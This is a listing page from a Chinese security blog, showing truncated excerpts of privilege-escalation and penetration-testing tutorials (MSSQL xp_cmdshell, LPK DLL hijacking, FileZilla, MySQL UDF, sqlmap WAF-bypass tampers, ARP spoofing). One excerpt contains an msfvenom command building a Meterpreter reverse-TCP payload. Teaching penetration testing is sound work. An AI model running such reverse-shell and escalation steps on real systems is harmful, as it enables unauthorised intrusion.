• 别以为有vpn我找不到你(网警抓人全过程)

    AdminAdmin 2020-07-08

    大致分为下列几种情况:1.不用代理网民发帖流程:发帖人 → ISP → 服务器托管商 → 服务器网警追踪流程:网监 → 服务器IP → 发帖人IP → 发帖人ISP → 档案爆菊几率:100% 2.只用1层私人VPN网民发帖流程:发帖人 → ISP → VPN → 服务器托管商 → 服务器网警追踪流程:网监 → 服务器IP → VPN的IP → 路...

    已有5人围观 ,发现 0个评论
  • mssql 提权

    AdminAdmin 2020-07-07

    0x01、mssql 提权恢复 xp_cmdshell几个命令# 查看是否存在 xp_cmdshell(返回非 0 即存在)select count(*) from master.dbo.sysobjects where xtype='x' a...

    已有12人围观 ,发现 0个评论
  • 提权教程:lpk劫持提权

    AdminAdmin 2020-07-07

    1、简介lpk劫持   在window2003 或 windowxp中 如果同一个目录中 存在 exe和 lpk.dll 每当exe执行的时候就会被劫持。利用这个特性 可以把lpk提权的文件放到权限较高的程序 ,当exe运行时,lpk.dl就可以进行提权。2、T00ls Lpk Sethc v4这个工具是生成lpk dll文件的工具,利用...

    已有6人围观 ,发现 0个评论
  • 渗透测试小技巧之寻找EXP

    AdminAdmin 2020-07-06

    0X00 前言:简单总结一下渗透过程中寻找 EXP 的一些方法,还顺便为 windows 下未打的漏洞补丁的寻找写了一个小工具,希望师傅们多多支持!0X01 Windows 下寻找可用的 exp1.简单的科普:拿到一台 windows 主机,能执行命令了,那么如果想提权的话最好的方式就是利用现有的 exp 直接打,肯定是要使用 systeminfo 这个命令...

    已有25人围观 ,发现 0个评论
  • 提权教程之zend反弹shell提权

    AdminAdmin 2020-07-06

    这篇是接着上篇内容所说。Zend_DLL_Hijacking.exe执行远控msfconsole 生成反弹shell生成攻击载荷msfvenom  -p windows/meterpreter/reverse_tcp lhost=192.168.0.106  lport=12345 -f&...

    已有7人围观 ,发现 0个评论
  • 提权教程之FileZilla的提权

    AdminAdmin 2020-07-06

    1、 简介  FileZilla 是一个ftp服务器, 假如配置不严的,读取xml密码 可以执行一些简答的命令默认安装目录C:\Program Files\FileZilla Server\ 2、 提权    FileZilla Server Interface.xml...

    已有7人围观 ,发现 0个评论
  • INUX UDF提权

    AdminAdmin 2020-07-06

    INUX UDF提权 Linux 一般情况下的是没有权限导出 udf 到 mysql 的插件目录的,除非有特殊的情况,所以今天这个教程可能对我们 linux 提权是没有起到任何有用的方面。看看就好别入戏太深。Plugin 一般是不可以写的就算是 mysql root 权限 一般都是不行的知道这种方法就好得到mysql的帐号和密码在mysql里执行...

    已有5人围观 ,发现 0个评论
  • sqlmap绕过waf之tamper脚本

    AdminAdmin 2020-07-05

    说明一般sqlmap绕过waf常用tamper对数据做修改来绕过waf,若是不行也可以自己编写tamper使用sqlmap -u [url] --tamper [tamper名]目前最新版1.3https://github.com/sqlmapproject/sqlmap/releasesapostrophemask....

    已有6人围观 ,发现 0个评论
  • 如何拯救被墙的服务器??

    AdminAdmin 2020-07-05

    本文仅供学术讨论。  严禁损害国家利益。  严禁通过技术手段破坏国家的正常通信网络!  本文中的所有信息均从Internet复制,请合法浏览!  繁荣,民主,文明,和谐,自由,平等,正义,爱国主义,奉献,正直和友善1#情况分析遇到无法顺利科学上网的情形,第一步应该判断自身网络是否...

    已有8人围观 ,发现 0个评论
  • Web安全之ARP欺骗

    AdminAdmin 2020-06-22

        ARP(Address Resolution Protocol)地址解析协议:在局域网中,网络中实际传输的是“帧”,帧里面是有目标主机的MAC地址的。在以太网中,一个主机要和另一个主机进行直接通信,必须要知道目标主机的MAC地址。但这个目标MAC地址是如何获得的呢?它就是通过地址解析协议获得的。所谓“地址解析”就是主机在...

    已有28人围观 ,发现 0个评论
请关注微信公众号
微信二维码
不容错过
Powered By 蚁人博客